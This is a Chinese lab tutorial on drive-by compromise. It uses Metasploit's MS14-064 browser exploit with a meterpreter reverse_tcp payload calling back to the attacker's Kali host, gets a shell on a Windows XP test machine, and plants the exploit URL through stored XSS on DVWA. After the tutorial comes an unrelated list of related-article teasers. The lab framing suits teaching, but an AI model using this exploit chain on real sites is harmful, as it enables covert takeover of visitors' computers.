XSS漏洞,通过XSS实现网页挂马

news2024/9/28 3:26:39

**今天讲下通过XSS实现网页挂马~*,目的是了解安全方面知识,提升生活网络中辨别度

原理:
在这里插入图片描述
实验分为两部分:
1、通过Kali linux,利用MS14_064漏洞,制作一个木马服务器。存在该漏洞的用户一旦通过浏览器访问木马服务器,会造成缓冲区溢出,攻击者可以直接获取用户的系统Shell。
2、将木马服务器的URL,插入到一个存在存储型XSS漏洞的正常web服务器中,一旦有人访问该服务器的挂马页面,而且该用户存在MS14_064漏洞,就会中招。
制作木马服务器:
1.概念说明

(1)MS14_064漏洞
MS代表MicroSoft,14_064指的是2014年的第64个漏洞。
该漏洞影响范围为Win95+IE3 – Win10+IE11全版本,造成被攻击主机缓冲区溢出,触发该漏洞需要客户端安装有power shell软件。
(2)MetaSploit Framework(MFS)
本次进行缓冲区溢出的工具主要是MetaSploit Framework,其中集成了各个平台上常见的溢出漏洞和利用代码,并且不断更新。
Kali linux 自带该工具,可直接使用。
MFS包含三个基本模块:
渗透攻击模块(exploit),用于实际发起渗透攻击;
辅助模块(auxiliary),执行扫描之类的动作;
攻击载荷模块(payload),目标系统被成功渗透后执行的代码,payload中的主要内容包括shellcode,一段获取shell的代码。
一般都是先使用渗透攻击模块exploit对目标系统进行渗透,渗透成功后执行攻击载荷模块payload。
2. MFS初始操作:
启动msf:root@kali:~# msfconsole
初始化数据库:msf5 > msfdb init
//数据库初始化后,msf查询速度会大幅提升
msf5 > db_status #查看MSF数据库连接状态 。
在这里插入图片描述
3.使用MS14_064漏洞
首先我们搜索一下MS14_064漏洞
msf5 > search MS14_064
在这里插入图片描述
调用这个exploit:msf5>use exploit/windows/browser/ms14_064_ole_code_execution
查看一下这个exploit需要配置的选项:
msf5 exploit(ms14_064_ole_code_execution) > show options
在这里插入图片描述
设置允许调用powershell:
msf5 exploit(ms14_064_ole_code_execution) > set AllowPowershellPrompt true
//该漏洞需要利用目标主机powershell功能
设置木马服务器IP(Kali IP):
msf5 exploit(ms14_064_ole_code_execution) > set srvhost 192.168.211.134
在这里插入图片描述
设置调用的payload:
msf5 exploit(ms14_064_ole_code_execution) > set payload windows/meterpreter/reverse_tcp
这里使用反弹连接payload,让靶机主动连接我们。使用reverse类型的好处在于,可以不用担心连接被靶机的防火墙阻断。
设置监听IP(kali IP):
msf5 exploit(ms14_064_ole_code_execution) > set lhost 192.168.211.134
再设置一下监听接口,靶机中招后会主动连接我们这个端口:
msf5 exploit(ms14_064_ole_code_execution) > set lport 4444
最后,输入exploit(或者run)开启攻击服务:
在这里插入图片描述
kali 的web服务已开启,并生成了一个URL:http://192.168.211.134:8080/Dyvk2r6MwyGc,一旦存在MS14_064漏洞的主机访问这个URL,就会被控制。
4.尝试控制靶机
我们使用一台Windows xp主机(192.168.211.171),通过浏览器访问http://192.168.211.134:8080/Dyvk2r6MwyGc
访问后,Kali 立刻提示已发送exploit至目标主机,并且打开了一个连接:
在这里插入图片描述
通过session -l 我们可以查看当前有会话的主机,id号为1:
在这里插入图片描述
使用 session -i +id号,我们就可以连上靶机
输入shell,成功取得靶机的shell:
在这里插入图片描述
下一步,我们就想办法,通过XSS将这个URL挂到一个web服务器上去,就不用我们亲自去传播这个木马了~
利用XSS网页挂马:
接下来我们就开始网页挂马吧~
首先我们的目标是一个存在存储型XSS漏洞的网页,看过我前面文章的小伙伴们应该知道,DVWA平台上就有专门给我们练习存储型XSS漏洞的页面,我们就通过这个网页来实践挂马。
在这里插入图片描述
将网页安全等级调整为low,插入如下js语句:

但是会发现网页有输入长度限制:
在这里插入图片描述
前端输入长度限制,利用火狐浏览器,查看源代码修改长度限制即可:
在这里插入图片描述
输入后顺利插入恶意js语句:
在这里插入图片描述
此时查看网页源代码,就能看到js脚本了:
在这里插入图片描述
最后,靶机通过浏览器访问这个挂马网页:
在这里插入图片描述
查看Kali,成功连接:
在这里插入图片描述
入侵成功~
payload 除了使用script标签以外,还有其他多种标签,如:
在这里插入图片描述
就这样吧

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/339741.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

C语言(C文件处理函数和文件指针)

C语言有很多文件操作函数,这里我们挑了一些重要的开始讲,首先说下这些函数都定义在stdio.h头文件中 目录 一.文件指针 二.文件处理函数 1.fopen(打开文件) 2.fclose(关闭文件) 3.getc和putc(从文件指针读取字符) 4.I/O工作…

「C++控制台生存游戏」暗黑体素 DarkVoxel 控制台版

“《只有作者能看懂的一款游戏》” 刚进高中前开始写的一款抽象的生存游戏 BUG很多请见谅 ###【点击此处,免费畅玩】### 类似泰拉瑞亚的一款游戏 『暗黑体素 DarkVoxel』 直接上图! 用控制台写出如此奇葩的生存游戏,可谓世间少有。 操作…

2022黑马Redis跟学笔记.实战篇(二)

2022黑马Redis跟学笔记.实战篇 二实战篇Redis开篇导读4.1短信登录4.1.1. 搭建黑马点评项目一、导入黑马点评项目二、导入SQL三、有关当前模型四、导入后端项目相关依赖配置redis和mysql连接项目组成概述关闭Linux防火墙五、导入前端工程六、 运行前端项目4.1.2. 基于Session实现…

选购交换机的参数依据和主要的参数指标详解

如何选购交换机?用什么交换机?在选购交换机时交换机的优劣无疑十分的重要,而交换机的优劣要从总体构架、性能和功能三方面入手。交换机选购时。性能方面除了要满足RFC2544建议的基本标准,即吞吐量、时延、丢包率外,随着…

网络是怎么连接笔记(一)WEB浏览器

文章目录介绍生成HTTP请求消息向DNS服务器查询WEB服务的IP地址全世界DNS服务器的大接力委托协议栈发送消息介绍 互联网整个消息传递流程 生成HTTP请求消息向DNS服务器查询WEB服务的IP地址然后DNS服务器进行查询IP地址委托协议给对应IP发送消息 生成HTTP请求消息 整个网络发…

Spring面试重点(三)——AOP循环依赖

Spring面试重点 AOP 前置通知(Before):在⽬标⽅法运行之前运行;后置通知(After):在⽬标⽅法运行结束之后运行;返回通知(AfterReturning):在⽬标…

2023年前端面试知识点总结(CSS篇)

近期整理了一下高频的前端面试题,分享给大家一起来学习。如有问题,欢迎指正! 1. 对CSS盒模型的理解 CSS3的盒模型有两种盒子模型:标准盒子模型、IE盒子模型 盒模型都是由四个部分组成的,分别是content(内容…

layui框架学习(6:基础菜单)

菜单是应用系统的必备元素,虽然网页中的导航也能作为菜单使用,但菜单和导航的样式和用途有所不同(不同之处详见参考文献5)。Layui中用不同的预设类定义菜单和导航的样式,同时二者依赖的模块也不一样。本文主要学习和记…

Vue (3)

文章目录1. 数据代理1.1 回顾1.2 开始2. 事件处理2.1 v-on:click 点击事件2.2 事件修饰符2.3 键盘事件3. 计算属性3.1 插值语法实现3.2 methods实现3.3 计算属性实现4. 监视属性4.1 深度监视4.2 监视属性的简写形式4.3 watch 与 computed 对比1. 数据代理 在学习 数据代理 时 先…

SQL数据查询——单表查询和排序

文章目录一、单表查询1.查询列1)查询全部列指定列2)查询经过计算的值3)列的别名2.查询元组1)消除取值重复的行(DISTINCT)2)条件查询(WHERE)3.空值参与运算4.着重号二、排序(ORDER BY子句)一、单表查询 单表查询指仅涉及…

Webpack的知识要点

在前端开发中,一般情况下都使用 npm 和 webpack。   npm是一个非常流行的包管理工具,帮助开发者管理项目中使用的依赖库和工具。它可以方便地为项目安装第三方库,并在项目开发过程中进行版本控制。   webpack是一个模块打包工具&#xff…

C语言深度剖析之程序环境和预处理

1.程序的翻译环境和执行环境 第一种是翻译环境,在这个环境中源代码被转换为可执行的机器指令 第二种是执行环境,它用于实际执行代码 2.翻译环境 分为四个阶段 预编译阶段 ,编译,汇编,链接 程序编译过程:多个…

使用vue3,vite,less,flask,python从零开始学习硅谷外卖(16-40集)

严正声明! 重要的事情说一遍,本文章仅供分享,文章和代码都是开源的,严禁以此牟利,严禁侵犯尚硅谷原作视频的任何权益,我知道学习编程的人各种各样的心思都有,但这不是你对开源社区侵权的理由&am…

iptables防火墙之SNAT与DNAT

目录 1、SNAT策略概述 1.SNAT策略的典型应用环境 2.SNAT策略的原理 3.SNAT工作原理 4.SNAT转换前提条件 5.开启SNAT命令 6.SNAT转换 2.SNAT示例 1. 配置网关服务器 2.Xshell 连接192.168.100.100 3.DNAT策略及应用 1. DNAT策略概述 2.DNAT 策略的应用 3.DNAT转换前提条件…

看完这篇 教你玩转渗透测试靶机vulnhub——Hack Me Please: 1

Vulnhub靶机Hack Me Please: 1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:漏洞利用③:获取反弹shell:④&#x…

how https works?https工作原理

简单一句话: https http TLShttps 工作原理:HTTPS (Hypertext Transfer Protocol Secure)是一种带有安全性的通信协议,用于在互联网上传输信息。它通过使用加密来保护数据的隐私和完整性。下面是 HTTPS 的工作原理:初始化安全会…

Camtasia2023最新版电脑视频录屏记录编辑软件

在Mac或Wind上有各种可用的视频记录和编辑软件,其中Camtasia被称为视频记录器和视频编辑器。录屏软件Camtasia2023到底有什么特色功能?本文将帮助您选择理想的选择来开始视频捕获,创建和编辑。Camtasia2023是Mac/win平台上一款使用非常简单的…

【JavaScript】题(牛客网)——熟练使用函数调用,超详细讲解

1 熟练使用函数调用 1.1 题目 执行以下程序,输出结果为 var uname "window"; var object {uname: "object",fun: function () {console.log(this.uname);return function () {console.log(this.uname);};}, };object.fun()();1.2 答案 ob…

ThingsBoard-设备配置

1、概述 从 ThingsBoard 3.2 开始,租户管理员可以使用设备配置文件为多个设备配置通用设置。每个设备在单个时间点都有一个且唯一的配置文件。 有经验的 ThingsBoard 用户会注意到设备类型已被弃用,取而代之的是设备配置文件。更新脚本将根据唯一的设备类型自动创建设备配置…

三、Java面向对象

1 . 方法 方法(method)是程序中最小的执行单元方法就是一些代码的打包 需要的时候可以直接调用方法之间是平级的关系 不能在方法里面定义方法方法不调用就不执行 方法的定义 // 方法的定义 /* [修饰符] 返回值类型 方法名称([参数 1],[参数 2]){语句A;return 返回值; } *///…